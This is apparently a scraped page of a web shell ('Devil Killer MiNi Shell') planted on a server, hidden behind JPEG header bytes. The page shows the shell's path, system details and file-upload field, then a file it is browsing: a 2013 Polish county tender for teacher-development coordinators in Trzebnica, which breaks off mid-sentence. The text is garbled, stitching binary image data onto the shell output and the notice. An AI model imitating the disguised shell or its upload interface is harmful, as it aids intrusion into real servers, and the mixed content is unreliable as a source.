JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131023/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131023/431876-N-2013.html

<p class="kh_header"><b>Trzebnica: Pełnienie funkcji szkolnego organizatora rozwoju edukacji oraz funkcji koordynatora ds. sieci i doskonalenia w ramach projektu Nauczyciel na 6 - wsparcie szkół/przedszkoli i nauczycieli z terenu powiatu trzebnickiego</b><br>
<b>Numer ogłoszenia: 431876 - 2013; data zamieszczenia: 23.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Trzebnicki , ul. Ks. Dz. W. Bochenka 6, 55-100 Trzebnica, woj. dolnośląskie, tel. 071 3120901 w. 32.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat.trzebnica.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji szkolnego organizatora rozwoju edukacji oraz funkcji koordynatora ds. sieci i doskonalenia w ramach projektu Nauczyciel na 6 - wsparcie szkół/przedszkoli i nauczycieli z terenu powiatu trzebnickiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest pełnienie funkcji:
1)szkolnego organizatora rozwoju edukacji (zwanym dalej SORE),
2)koordynatora ds. sieci i doskonalenia (zwanym dalej koordynatorem),
w ramach projektu Nauczyciel na 6 - wsparcie szkół/przedszkoli i nauczycieli z terenu powiatu trzebnickiego, realizowanego przez Powiat Trzebnicki. 
2.Głównym celem projektu jest podniesienie jakości funkcjonowania systemu doskonalenia nauczycieli w Powiecie Trzebnickim poprzez stworzenie planów wspomagania szkół/przedszkoli, spójnych z ich rozwojem w obszarach wymagających szczególnego wsparcia w okresie do 31 lipca 2015 r.
3.Biorąc pod uwagę formę prawną potencjalnych Wykonawców niniejszego zamówienia oraz zapisy projektu o dofinansowanie, usługa wykonywana będzie na podstawie umowy zlecenia.
4.Zamawiający dokonał podziału zamówienia na 10 części. Wykonawca może złożyć ofertę na dowolną ilość części z tym, że osoba wskazana w ofercie do pełnienia funkcji SORE lub koordynatora może pełnić tę funkcję tylko w jednej części. Zamawiający nie dopuszcza łączenia funkcji.
5.Szkolny organizator rozwoju edukacji (dalej SORE) jest zewnętrznym specjalistą, który pracuje na rzecz 7-8 szkół/przedszkoli z terenu powiatu trzebnickiego w ramach realizowanego projektu.  
a) Szacunkowa ilość godzin dla każdego SORE: 40 godzin lekcyjnych miesięcznie x 21 miesięcy (od 01.11.2013 r. do 31.07.2015 r.).
b) Kalkulacja miesięczna godzin: średnio 2 godziny lekcyjne w placówce oświatowej tygodniowo x 2 placówki oświatowe w tygodniu = 4 godziny lekcyjne w 2 placówkach tygodniowo + średnio 6 godzin lekcyjnych tygodniowo na dokumentację SORE, tj. średnio 10 godzin lekcyjnych tygodniowo x 4 tygodnie = średnio 40 godzin lekcyjnych pracy SORE w miesiącu.
c) Głównym zadaniem SORE jest wspieranie dyrektora i nauczycieli danej placówki oświatowej w przygotowaniu i realizacji rocznego planu wspomagania (RPW) zbudowanego na podstawie wybranej przez szkołę/przedszkole oferty doskonalenia (przygotowanej w ramach projektu ORE System doskonalenia nauczycieli oparty na ogólnodostępnym kompleksowym wspomaganiu szkół). SORE wspiera szkołę/przedszkole i dyrektora, towarzysząc oraz służąc pomocą na kolejnych etapach przygotowania i realizacji planu wspomagania. Po uruchomieniu projektu SORE nawiązuje kontakt ze szkołą/przedszkolem, buduje relacje z dyrektorem i radą pedagogiczną. Współpracuje z dyrektorem i radą pedagogiczną w przeprowadzeniu diagnozy i konstruowaniu rocznego planu wspomagania. Odpowiada za prawidłową organizację działań związanych z zewnętrznym wspomaganiem. Pozostaje w stałym kontakcie z dyrektorem i pracownikami zaangażowanymi w realizację rocznego planu wspomagania. Wspiera nauczycieli w czasie wdrażania nowych umiejętności i wypracowanych procedur. Swoje działania realizuje bezpośrednio w placówce oświatowej, którą wspiera. Obowiązki swoje realizuje z zachowaniem zasad określonych w Poradniku dla beneficjenta (wyd. dotyczące konkursu nr 1/POKL/3.5/2012).
d) Obowiązki SORE:
1)pomaganie dyrektorowi w zdiagnozowaniu potrzeb szkoły/przedszkola,
2)pomaganie w formułowaniu celów wynikających ze zdiagnozowanych potrzeb i określeniu obszaru do rozwoju - współpraca z radą pedagogiczną,
3)wsparcie szkoły w przygotowaniu rocznego planu wspomagania ściśle odpowiadającego na potrzeby szkoły i zbudowanego na podstawie jednej z ofert doskonalenia (przeprowadzenie warsztatu diagnostyczno-rozwojowego),
4)wsparcie przy zapewnianiu obiegu informacji (stały kontakt z osobami zaangażowanymi w realizację RPW, dbanie o przepływ informacji dotyczących działań podejmowanych w ramach jego współpracy ze szkołą),
5)wnioskowanie o pozyskanie zewnętrznych ekspertów (jeśli zaistnieje taka potrzeba),
6)organizowanie zaplanowanych form wspomagania - we współpracy ze szkołą,
7)organizowanie systemu wsparcia dla pracowników szkoły we wdrażaniu nowo nabytych umiejętności i wypracowanych procedur (np. organizacja i prowadzenie konsultacji),
8)monitorowanie przebiegu realizacji rocznego planu wspomagania, reagowanie na pojawiające się trudności,
9)dokumentowanie podejmowanych działań (zgodnie z wymogami określonymi przez Ośrodek Rozwoju Edukacji oraz Zamawiającego - Powiat Trzebnicki),
10)przygotowanie i przeprowadzenie wśród pracowników szkoły ankiet z przebiegu wspomagania,
11)przygotowanie sprawozdania z przebiegu realizacji rocznego planu wspomagania,
12)przedstawienie sprawozdania z przebiegu realizacji rocznego planu wspomagania dyrektorowi szkoły oraz radzie pedagogicznej,
13)udział w podsumowaniu podjętych działań - współpraca z radą pedagogiczną nad rekomendacjami do pracy szkoły w kolejnym roku szkolnym,
14)ścisła współpraca z Koordynatorem projektu oraz członkami Zespołu projektowego,
15)współpraca z Powiatowym Ośrodkiem Doradztwa Metodyczno-Programowego w Trzebnicy,
16)oznaczanie wszystkich dokumentów związanych z projektem logotypami POKL, UE, Europejskiego Funduszu Społecznego i Powiatu Trzebnickiego (herb),
17)sporządzanie miesięcznej karty czasu pracy.
e) Do wynagrodzenia za miesiąc wykonywania przedmiotu zamówienia Wykonawca winien wliczyć koszty dojazdów do placówek (delegacje), które będzie zobowiązany wykazać w kartach pracy za dany miesiąc. 
f) W przypadku realizacji zadań przez Wykonawcę w innym projekcie w ramach Narodowych Strategicznych Ram Odniesienia Zamawiający wymaga, aby obciążenie wynikające z powyższego nie wykluczało możliwości prawidłowej i efektywnej realizacji wszystkich zadań powierzonych w ramach przedmiotu zamówienia a łączne zaangażowanie w realizację zadań powierzonych w ramach przedmiotu zamówienia nie przekraczało 240 godzin miesięcznie (na potwierdzenie powyższego wymaga się podpisania stosownego oświadczenia na etapie podpisania umowy na realizację zadania). 
6.Koordynator ds. sieci i doskonalenia
a)Szacunkowa ilość godzin dla każdego koordynatora: 40 godzin lekcyjnych w projekcie.
b)W ramach jednej sieci współpracować ze sobą będzie do 20 nauczycieli z różnych szkół i przedszkoli z terenu powiatu trzebnickiego, tj. w sumie ok. 100 nauczycieli. Uczestnicy sieci będą spotykać się przeciętnie 5 razy po 4 godziny lekcyjne w trakcie trwania projektu w ramach jednej sieci (co około 2 miesiące). Między spotkaniami nauczyciele będą pracować na platformie internetowej udostępnionej przez Ośrodek Rozwoju Edukacji. 
c)W ramach projektu planuje się powołanie 6 sieci:
1)1 sieć dla dyrektorów (w ramach 2 grup po 13 osób); rekrutacja do sieci: każdy dyrektor/wicedyrektor będzie uczestniczyć w sieci dla dyrektorów i wytypuje min. 1 nauczyciela do pracy w sieci problemowej i / lub tematycznej. 
2)5 sieci przedmiotowo-problemowych - każda po ok. 20 uczestników (łącznie ok. 100 nauczycieli). 
d)W roku szkolnym 2013/2014 obędą się 3 sieci:
-1 grupa sieci dla dyrektorów (temat sieci: Rola dyrektora w promocji i budowaniu wizerunku szkoły/przedszkola),
-2 sieci przedmiotowo-problemowe (tematy sieci: 1. Doświadczenie i eksperymenty na zajęciach z przedmiotów przyrodniczych, 2. Nauczyciele pracują zespołowo).
e)W roku szkolnym 2014/2015 odbędą się 4 sieci:
-1 grupa sieci dla dyrektorów (temat sieci: Rola dyrektora w promocji i budowaniu wizerunku szkoły/przedszkola), 
-3 sieci przedmiotowo-problemowe (tematy sieci: 1. Praca z nowoczesnymi technologiami, 2. Jak rozwijać twórcze myślnie uczniów, 3. Jak wspierać dziecko w uczeniu matematyki).
f)Koordynator przygotuje sprawozdanie z realizacji rocznego planu pracy w ramach sieci, zawierającego relację z przebiegu spotkań oraz wypracowanych rezultatów i zamieści je na platformie internetowej oraz na stronie www projektu. Współpraca będzie odbywać się również za pomocą forów wymiany doświadczeń, których moderatorem będzie koordynator.
g)Obowiązki koordynatora ds. sieci i doskonalenia:
1)przygotowanie planu działania sieci współpracy i samokształcenia zgodnego z potrzebami zgłoszonymi przez uczestników, harmonogramu pracy sieci;
2)prowadzenie sieci zgodnie z wytycznymi Poradnika metodycznego dla koordynatorów sieci współpracy i samokształcenia (wyd. ORE, Kraków 2012);
3)organizowanie i prowadzenie spotkań uczestników sieci w Powiatowym Ośrodku Doradztwa Metodyczno-Programowego w Trzebnicy oraz w Starostwie Powiatowym w Trzebnicy;
4)wnioskowanie o pozyskanie ekspertów zewnętrznych  - specjalistów w zakresie tematu pracy sieci (jeśli zajdzie taka potrzeba);
5)bieżące moderowanie sieci, w tym forum dyskusyjnego oraz wymiany doświadczeń dla uczestników (praca na platformie internetowej Ośrodka Rozwoju Edukacji);
6)zamieszczanie na platformie internetowej materiałów samokształceniowych i innych zasobów edukacyjnych łączących się z tematyką sieć;
7)sporządzenie rocznego sprawozdania z pracy sieci;
8)promocja działań sieci;
9)prowadzenie bieżącej dokumentacji związanej z realizacją sieci;
10)ścisła współpraca z Asystentem koordynatora ds. sieci i doskonalenia oraz pozostałymi członkami Zespołu projektowego,
11)współpraca z Powiatowym Ośrodkiem Doradztwa Metodyczno-Programowego w Trzebnicy;
12)	oznaczanie wszystkich dokumentów związanych z projektem logotypami POKL, UE, Europejskiego Funduszu Społecznego i Powiatu Trzebnickiego (herb).
7.W przypadku realizacji zadań przez Wykonawcę w innym projekcie w ramach Narodowych Strategicznych Ram Odniesienia Zamawiający wymaga, aby obciążenie wynikające z powyższego nie wykluczało możliwości prawidłowej i efektywnej realizacji wszystkich zadań powierzonych w ramach przedmiotu zamówienia a łączne zaangażowanie w realizację zadań powierzonych w ramach przedmiotu zamówienia nie przekraczało 240 godzin miesięcznie (na potwierdzenie powyższego wymaga się podpisania stosownego oświadczenia na etapie podpisania umowy na realizację zadania).
8.Ze względu na szczególną specyfikę przedmiotu zamówienia oraz koniczność optymalnego wykorzystania potencjału wykonawcy nie jest możliwe łącznie funkcji SORE z funkcjami koordynatorów. Wykonawca składający ofertę na kilka części postępowaniach nie może zgłosić tej samej osoby do pełnienia więcej niż jednej z powyższych funkcji.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 ustawy, stanowiących nie więcej niż 20% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9, 80.52.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w przedmiotowym postępowaniu nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa się minimalnych standardów. 
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa się minimalnych standardów. 
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa się minimalnych standardów. 
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże dysponowanie, co najmniej jedną osobą:
1) w zakresie części 1-3:
a)	posiadającą wykształcenie wyższe pedagogiczne II stopnia,
b)	posiadającą stopień awansu zawodowego nauczyciela dyplomowanego,
c)	posiadającą doświadczenie w zarządzaniu (min. 2 lata na stanowisku kierowniczym w placówce oświatowej),
d)	posiadającą niezbędną wiedzę i doświadczenie w moderowaniu grupowej pracy koncepcyjnej osób dorosłych, np. prowadzenie szkoleń, prowadzenie rad pedagogicznych, kierowanie spotkaniami, prowadzenie warsztatów,
e)	posiadającą przygotowanie do pracy moderatora (np. TERM, ukończone kursy lub studia przygotowujące do pracy trenera, edukatora, moderatora, organizatora rozwoju edukacji, coacha, certyfikat trenerski, edukatorski),
f)	dyspozycyjną w okresie realizacji projektu,
g)	posiadającą pełną zdolność do czynności prawnych oraz korzystania z pełni praw publicznych;
2) w zakresie części 4-10:
a)	posiadającą wykształcenie wyższe pedagogiczne co najmniej I stopnia,
b)	posiadającą doświadczenie w pracy z grupą osób dorosłych, prowadzenie różnych form pracy z grupami osób dorosłych, w tym działań realizowanych w szkołach i skierowanych do nauczycieli (np. przygotowanie i prowadzenie lekcji otwartych, szkolenia rad pedagogicznych, nauczycielskich grup przedmiotowych, doradztwo), 
c)	posiadającą doświadczenie w edukacji: min. 5 lat doświadczenie w pracy nauczyciela/ pedagoga/psychologa, ukończone kursy, szkolenia/studia podyplomowe odpowiadające zakresowi tematycznemu pracy danej sieci, pełnienie funkcji związanej z tematyką pracy sieci (np. funkcji dyrektora szkoły lub placówki oświatowej w wypadku sieci dyrektorskich) udział w projektach systemowych np. w zakresie specjalnych potrzeb edukacyjnych, wdrażania podstawy programowej, realizacji projektu edukacyjnego, pomocy psychologiczno-pedagogicznej),
d)	dyspozycyjną w okresie realizacji projektu, 
e)	posiadającą znajomość ICT, internetu,
f)	posiadającą pełną zdolność do czynności prawnych oraz korzystania z pełni praw publicznych;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa się minimalnych standardów. 
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający przewiduje możliwość dokonania istotnej zmiany postanowień umowy zawartej na skutek przeprowadzenia niniejszego postępowania w stosunku do treści oferty złożonej przez Wykonawcę, na podstawie, której dokonano wyboru Wykonawcy, w przypadku: 
1)	zaistnienia okoliczności, których Zamawiający nie mógł przewidzieć w dacie dokonywania wyboru najkorzystniejszej oferty, w szczególności w przypadku zmian na rynku usług objętych niniejszym postępowaniem, wystąpienia istotnych trudności w pozyskaniu przez Wykonawcę lub Zamawiającego materiałów niezbędnych do wykonania zamówienia, gdy zmiany są korzystne dla Zamawiającego, 
2)	zmiany wynagrodzenia Wykonawcy w przypadku zmiany przez ustawodawcę przepisów dotyczących stawki podatku VAT, 
3)	w sytuacjach których nie można było przewidzieć w chwili zawarcia umowy, a niepowstałych z winy Zamawiającego lub Wykonawcy, Zamawiający dopuszcza możliwość niezrealizowania pełnego zakresu zamówienia wraz z odpowiednim zmniejszeniem wynagrodzenia umownego,
4)	gdy zmiany będą korzystne dla Zamawiającego i nie będą:
a)	wprowadzane warunki, które gdyby zostały ujęte w ramach procedury przetargowej udzielenia zamówienia umożliwiłyby dopuszczenie innych ofert niż ta, która została pierwotnie dopuszczona;
b)	modyfikowały równowagi ekonomicznej umowy na korzyść Wykonawcy w sposób, który nie był przewidziany w postanowieniach pierwotnego zamówienia.
lub będą polegały w szczególności na:
a)	skróceniu terminu wykonania umowy, przyśpieszenie ukończenia usług,
b)	obniżeniu kosztu ponoszonego przez Zamawiającego na wykonanie, utrzymanie lub użytkowanie przedmiotu zamówienia,
c)	obniżeniu kosztu wykonania przedmiotu zamówienia i tym samym wynagrodzenia Wykonawcy,
5)	zmiany terminu realizacji z powodu okoliczności leżących po stronie Zamawiającego w szczególności wstrzymania realizacji przedmiotu zamówienia przez Zamawiającego,
6)	zmiany terminu realizacji umowy lub harmonogramu prac w związku z wystąpieniem potrzeby udzielenia zamówienia dodatkowego lub uzupełniającego,
7)	gdy niedotrzymanie pierwotnego terminu realizacji umowy, stanowi konsekwencję zdarzeń niezależnych od Wykonawcy, niestanowiących jego problemów organizacyjnych - Zamawiający dopuszcza możliwość przedłużenia terminu realizacji umowy o czas niezbędny do usunięcia konsekwencji zdarzeń,
8)	zmiany korzystnej dla Zamawiającego naruszającej równowagę ekonomiczną umowy oraz wpływającej na zmianę przedmiotu zamówienia, w przypadku zmiany okoliczności faktycznych sprawiających, że dalsza realizacja zamówienia publicznego w obecnym kształcie nie leżałaby w interesie publicznym,
9)	zmiany sposobu spełnienia świadczenia z powodu nadzwyczajnej zmiany stosunków w wyniku których spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą, czego strony nie przewidywały przy zawarciu umowy o zamówienie, 
10)	zmiany sposobu spełnienia świadczenia w sytuacji, gdy już po wyborze oferty zmieniły się okoliczności w sposób uniemożliwiający zawarcie umowy na warunkach wynikających z oferty,
11)	zmiany danych podmiotowych dotyczących Wykonawcy, lokalizacji siedziby biura Wykonawcy,
12)	zmiany danych osobowych - zmiany osób (personelu).

Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Warunkiem dokonania zmian postanowień zawartej umowy w formie aneksu do umowy jest zgoda obu stron wyrażona na piśmie, pod rygorem nieważności zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.trzebnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Trzebnicy przy 
